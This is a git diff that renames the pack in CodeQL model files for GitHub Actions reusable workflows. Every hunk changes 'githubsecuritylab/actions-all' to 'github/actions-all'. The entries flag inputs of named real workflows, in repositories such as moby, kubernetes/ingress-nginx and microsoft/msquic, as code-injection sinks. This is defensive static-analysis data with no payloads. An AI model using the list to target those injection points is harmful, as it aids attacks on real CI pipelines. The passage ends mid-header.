a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 0439d6e1d4c..bd2ceb9eeb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 357e11b3c0b..d52fc08b2fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 4d3ea1e9156..8a664d1bc87 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 44b905cab67..bbfe6cfc501 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 192d975ea57..75bbf328d64 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 627fca5d3ff..6cd55f46f64 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 4d4fd0f229e..4c85243e415 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 1ceacd2f1c0..fd1c5ae4149 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index ba0f5c06a67..d848e7587ca 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 3c8f11dd0cd..e2e3fa8f593 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index b7c00fff318..69d627bdc7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 5a129691bc5..11687fa31b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index bd07156d06b..3d394751599 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index b029e341710..2fb4ca82763 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 995e692e494..92d91e541b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index db325a06baa..ebf68ff3c12 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2c91ab62b0c..22f0fedcc07 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 8fdf39a0bbc..23da361034c 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 00fceb9c7bd..19a5da19960 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index a6b947dfbce..abd0215aada 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 9359ea482c0..5144d9ee2cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 023666e67ff..5a70ae48ec6 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index 7005b7dd7c9..81130d31fa3 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8b73f89401a..f49f239ac9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index 3cf43b814db..53be189b31e 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index d33e308c7eb..2d6132a396f 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 5c1de93f08a..0cb5e01e3aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index aab9fa502cb..cd3ca5d7c01 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index b58fff831e1..c8f1b93ef2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index f96264fbf42..7877af9bbbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 6aaf6aa2783..3d9b8716682 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index d246f4ce644..b14db181cce 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index a35a1a628e6..6a883e369c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index ec22645570f..9612750345d 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index e0eccb26a54..2c6f4438846 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 5f85bb1a91a..109b1fefa7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 7f1af324260..87f8bc706b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index b06b390e718..4c2f4e391b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["moby/moby/.github/workflows/.windows.yml", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml index d5746b566cc..e3e0a3460d4 100644 --- a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index fbe9e286d2b..01539c4329b 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6ba2fc75375..d26e49d3ef8 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 6d522b776dc..f5b370e3d59 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index c210f350439..72659e36271 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 81eeb82033c..f37d70a718d 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6d81f2ff242..3b4ed4b18b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index b7ea7250825..3dddb9bd3f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 972b6f15baa..49654eb84b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 07f0c5c0f69..f46bcbee1b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 6bbf33e7f89..e3791339c03 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 165965dd568..f5f6c919cfb 100644 --- 